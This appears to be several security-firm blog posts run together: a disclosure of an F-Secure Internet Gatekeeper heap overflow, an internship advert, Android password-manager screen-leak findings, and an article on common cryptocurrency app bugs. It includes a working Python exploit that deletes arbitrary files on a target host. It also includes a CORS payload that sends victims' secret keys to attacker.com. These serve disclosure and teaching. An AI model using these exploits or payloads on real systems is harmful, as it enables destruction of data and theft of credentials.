This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.
All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.
An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.
The original affected package has the following SHA256 hash:
1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26
.
Proceed with the installation:
yum install glibc.i686
rpm -I <fsigkbin>.rpm
Now you can use GHIDRA/IDA or your favorite dissassembler/decompiler to start reverse engineering Internet Gatekeeper!
As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.
F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.
The fact that it was written in C/C++ lead us down the road of looking for memory corruption vulnerabilities which are usually common in this language.
It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron which uses Radamsa as the underlying engine. fuzzotron
has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid POST
request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as fuzzing seed.
When analyzing the input mutated by radamsa
we could quickly see that the root cause of the vulnerability revolved around the Content-length
header. The generated test that crashed the software had the following header value: Content-Length: 21487483844
. This suggests an overflow due to incorrect Integer math.
After running the test through gdb
we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request
function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.
To demonstrate the issue we’re going to send a POST
request to port 9012
where the admin panel is running. We set a very big Content-Length
header value.
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844
AAAAAAAAAAAAAAAAAAAAAAAAAAA
The application will parse the request and execute the fs_httpd_get_header
function to retrieve the content length. Later, the content length is passed to the function strtoul
(String to Unsigned Long)
The following pseudo code provides a summary of the control flow:
content_len = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len ){
content_len_new = strtoul(content_len_old, 0, 10);
}
What exactly happens in the strtoul
function can be understood by reading the corresponding man
pages. The return value of strtoul
is an unsigned long int, which can have a largest possible value of 2^32-1
(on 32 bit systems).
The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).
As our provided Content-Length
is too large for an unsigned long int, strtoul
will return the ULONG_MAX value which corresponds to 0xFFFFFFFF
on 32 bit systems.
So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request
function tries to issue a malloc request to make room for our data, it first adds 1 to the content_length
variable and then calls malloc
.
This can be seen in the following pseudo code:
// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)
This causes a problem as the value 0xFFFFFFFF + 1
will cause an integer overflow, which results in 0x00000000
. So the malloc call will allocate 0 bytes of memory.
Malloc does allow invocations with a 0 bytes argument. When malloc(0)
is called a valid pointer to the heap will be returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can be also read in the man pages:
The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().
If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read
.
// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new)
}
During the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.
In summary, we can leverage Malloc’s chunks of size 0x10 with an overflow of arbitrary data to override existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true
, and then subsequently spraying the heap with the full path of the file we want to delete. Internet Gatekeeper internal handler has a decontruct_http
method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal which is sufficient to demonstrate the severity of the issue.
from pwn import *
import time
import sys
def send_payload(payload, content_len=21487483844, nofun=False):
r = remote(sys.argv[1], 9012)
r.send("POST / HTTP/1.1\n")
r.send("Host: 192.168.0.122:9012\n")
r.send("Content-Length: {}\n".format(content_len))
r.send("\n")
r.send(payload)
if not nofun:
r.send("\n\n")
return r
def trigger_exploit():
print "Triggering exploit"
payload = ""
payload += "A" * 12 # Padding
payload += p32(0x1d) # Fast bin chunk overwrite
payload += "A"* 488 # Padding
payload += p32(0xdda00771) # Address of payload
payload += p32(0xdda00771+4) # Junk
r = send_payload(payload)
def massage_heap(filename):
print "Trying to massage the heap....."
for x in xrange(100):
payload = ""
payload += p32(0x0) # Needed to bypass checks
payload += p32(0x0) # Needed to bypass checks
payload += p32(0xdda0077d) # Points to where the filename will be in memory
payload += filename + "\x00"
payload += "C"*(0x300-len(payload))
r = send_payload(payload, content_len=0x80000, nofun=True)
r.close()
cut_conn = True
print "Heap massage done"
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
exit()
massage_heap(sys.argv[2])
time.sleep(1)
trigger_exploit()
print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])
Current exploit reliability is around 60-70% of the total attempts, and our exploit PoC relies on the specific machine as listed in the prerequisites.
Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to info@doyensec.com ;)
This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.
“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler
At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.
Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.
The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.
Day one is important. Interns will be responsible for setting up their Doyensec provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work.
While the internship is considered full time over the course of 2/3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results and our approach to the internship is no different.
“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval
Work days are generally grouped into two categories:
a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.
b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.
Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:
What did you learn during your internship?
“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”
Have you improved your skillset?
“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”
Will the internship have an impact on your career?
“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”
The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe.
What do we offer:
Our perfect candidate:
In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.
Do you want to join Doyensec as an intern? Apply via our careers portal!
A few months ago I stumbled upon a 2016 blog post by Mark Murphy, warning about the state of FLAG_SECURE
window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn’t confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).
The FLAG_SECURE
setting was initially introduced as an additional setting to WindowManager.LayoutParams
to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on “non-secure displays”.
This last term was created to distinguish between virtual screens created by the MediaProjection API (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.
While FLAG_SECURE
nowadays serves its original purpose well (to the delight of e.g. Netflix, Google Play Movies, Youtube Red), developers during the years mistook this “secure” flag as an easy catch-all security feature provided by Android to mark the entire app from being excepted from a screen capture or recording.
Unfortunately, this functionality is not global for the entire app, but can only be set on specific screens that contain sensitive data. To make matters worse, every Android fragment used in the application will not respect the FLAG_SECURE
set for the activity and won’t pass down the flag to any other Window
instances created on behalf of that activity. As a consequence of this, several native UI components like Spinner
,Toast
,Dialog
,PopupWindow
and many others will still leak their content to third party applications having the right permissions.
After a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.
With this in mind, I fired up a screen capture application (mnml) and started poking around.
After a few days of testing, every Android password manager examined (4) was found to be vulnerable to some extent.
The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.
In 1Password, the Account Settings’ section offers a way to manage 1Password accounts. One of the functionalities is “Large Type”, which allows showing an account’s Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks the generated password to third-party applications installed on the victim’s device. The Secret Key is combined with the user’s Master Password to create the full encryption key used to encrypt the accounts data, protecting them on the server side.
This was fixed in 1Password for Android in version 7.1.5, which was released on May 29, 2019.
When a user taps the password field, Keeper shows a “Copied to Clipboard” toast. But if the user shows the cleartext password with the “Eye” icon, the toast will also contain the secret cleartext password. This fragment showing the copied password leaks the password to third-party applications.
This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. An official advisory was also issued.
Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameter for the “safe” passwords is visible by third parties applications on the victim’s device.
Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the FLAG_SECURE
flag, resulting in its leak.
The issue was fixed in Dashlane for Android in version 6.1929.2.
Several scenarios would result in an app being installed on a user’s phone recording their activity. These include:
If these scenarios seem unlikely to happen in real life, it is worth noting that there have been several instances of apps abusing this class of attacks in the recent past.
Many thanks to the 1Password, Keeper, and Dashlane security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.
As always, this research was possible thanks to my 25% research time at Doyensec!
In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchanges web interfaces, custody systems, and backbone infrastructure components.
We have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to create better systems.
In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.
Breaking Crypto Currency Systems != Breaking Crypto (at least not always)
For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.
This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.
Cross-Origin Resource Sharing is used for relaxing the Same Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS can have a great impact on the website security posture as other sites might access the page content.
Imagine a website with the following HTTP response headers:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag and a sandbox attribute.
<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();
function callback() {
location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>
When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys
and retrieve their secret keys.
This can also happen when the Access-Control-Allow-Origin
response header is dynamically updated to the same domain as specified by the Origin request header.
Access-Control-Allow-Origin
is never set to null
Access-Control-Allow-Origin
is not taken from a user-controlled variable or headerOrigin
HTTP header into Access-Control-Allow-Origin
In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors, however there is a specific class of idiosyncrasies that can have devastating effects.
Let’s consider this Python code as an example:
# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])
At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that Python runs with __debug__
by default. This allows for assert statements like the security control illustrated above. When the code gets compiled to optimized byte code (*.pyo files
) and lands into production, all asserts are gone. As a result, the application will not enforce any security checks.
Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.
For example, let’s consider the following Swift code:
// No assert if password is == mysecret
if (password != "mysecretpw") {
assertionFailure("Password not correct!")
}
If you were to run this code in Xcode, then it would simply hit your assertionFailure
in case of an incorrect password. This is because Xcode compiles the application without any optimizations using the -Onone
flag. If you were to build the same code for the Apple Store instead, the check would be optimized out leading to no password check at all since the execution will continue. Note that there are many things wrong in those three lines of code.
Talking about assertions, PHP takes the first place and de-facto facilitates RCE when you run asserts with a string argument. This is due to the argument getting evaluated through the standard eval
.
assert
statements for guarding code and enforcing security checksA bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.
For example, let’s consider a withdrawal function that looks for the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account.
Imagine the following example code:
if data["wallet"].balance < data["amount"]:
error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...
data["wallet"].balance = data["wallet"].balance - data["amount"]
The if
statement correctly checks if the balance is higher than the requested amount. However, the code does not enforce the use of a positive number.
Let’s try with -100
coins in a wallet account having 200
coins.
The check would be satisfied and the code responsible for updating the amount would look like the following:
data["wallet"].balance = 200 - (-100) # 300 coins
This would enable an attacker to get free money out of the system.
Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which signed
vs unsigned
types come to play.
In most architectures, a signed
short integer is a 2 bytes type that can hold a negative number and a positive number.
In memory, positive numbers are represented as 1 == 0x0001
, 2 == 0x0002
and so forth. Instead, negative numbers are represented as two’s complement -1 == 0xffff
,-2 == 0xfffe
and so forth.
These representations meet on 0x7fff
, which enables a signed integer to hold a value between -32768
and 32767
.
Let’s take a look at an example with pseudo-code:
signed short int bank_account = -30000
Assuming the system still allows withdrawals (e.g. perhaps a loan), the following code will be exercised:
int withdraw(signed short int money){
bank_account -= money
}
As we know, the max negative value is -32768
. What happens if a user withdraws 2768 + 1
?
withdraw(2769); //32767
Yes! No longer in debt thanks to integer wrapping. Current balance is now 32767
.
signed
vs unsigned
types are used across the entire codebase. Note that the signed integer overflow is considered undefined behavior.Last but not least, we would like to introduce a simple infoleak bug. This is a very widespread issue present in the password reset mechanism of many web platforms.
A standard procedure for a password reset in modern web applications involves the use of a secret link sent out to the user via email. The secret is used as an authentication token to prove that the recipient had access to the email associated with the user’s registration.
Those links typically take the form of https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
or https://example.com/passwordreset?token=2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
.
But what actually happens when the user clicks the link?
When a web browser requests a resource, it typically adds an HTTP header, called the Referer
header indicating the URL of the resource from which the request originated. If the resource being requested resides on a different domain, the Referer
header is still generally included in the cross-domain request. It is not uncommon that the password reset page loads external JavaScript resources such as libraries and tracking code. Under those circumstances, the password reset token will be also sent to the 3rd-party domains.
GET /libs/jquery.js HTTP/1.1
Host: 3rdpartyexampledomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Referer: https://example.com/passwordreset/2a8c5d7e-5c2c-4ea6-9894-b18436ea5320
Connection: close
As a result, personnel working for the affected 3rd-party domains and having access to the web server access logs might be able to take over accounts of the vulnerable web platform.
Referer
header should always be removed using one of the following techniques:
data:
or javascript:
<iframe src=about:blank>
<meta name="referrer" content="no-referrer" />
Referrer-Policy
header, assuming your application supports recent browsers onlyIf you would like to talk about securing your platform, contact us at info@doyensec.com!